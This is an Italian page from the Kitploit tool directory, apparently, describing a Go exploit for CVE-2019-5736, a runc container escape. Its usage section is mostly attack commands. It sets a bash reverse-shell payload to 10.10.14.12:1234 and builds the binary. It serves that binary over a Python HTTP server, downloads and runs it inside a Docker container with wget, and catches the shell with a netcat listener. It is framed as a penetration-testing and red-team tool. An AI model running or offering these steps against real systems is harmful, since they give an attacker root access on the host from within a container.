Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/h3x0v3rl0rd/cve-2019-5736
Analisi delle VulnerabilitàExploitPenetration TestingRed TeamingSviluppo PayloadEscape dal Container
GitHubh3x0v3rl0rd/cve-2019-5736

CVE-2019-5736

Exploit basato su Go per CVE-2019-5736 (Runc container escape) con un payload di reverse shell personalizzabile, progettato per penetration testing e operazioni red team contro container Docker vulnerabili.

Vedi Repository
401 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736

Utilizzo :

la macchina è vulnerabile a CVE-2019-5736, segui i passaggi nell'exploit Runc (CVE-2019-5736). Scarica il file main.go, modifica il payload nel file come segue:

root@kitploit:~
  var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"

Successivamente, esegui:

root@kitploit:~
  go build main.go

Ospita un server http:

root@kitploit:~
  python3 -m http.server

image

Poi apri 3 terminali come di seguito:

image

root@kitploit:~
Terminale 1
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
  wget http://10.10.14.12/main
  chmod +x main
  ./main

Terminale 2
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

Terminale 3
  nc -nlvp 1234

una volta eseguito ./main nel primo terminale ssh, esegui immediatamente il secondo comando nel secondo terminale ssh, quindi otterrai la reverse shell netcat nel terminale 3

image

image

Scarica lo strumento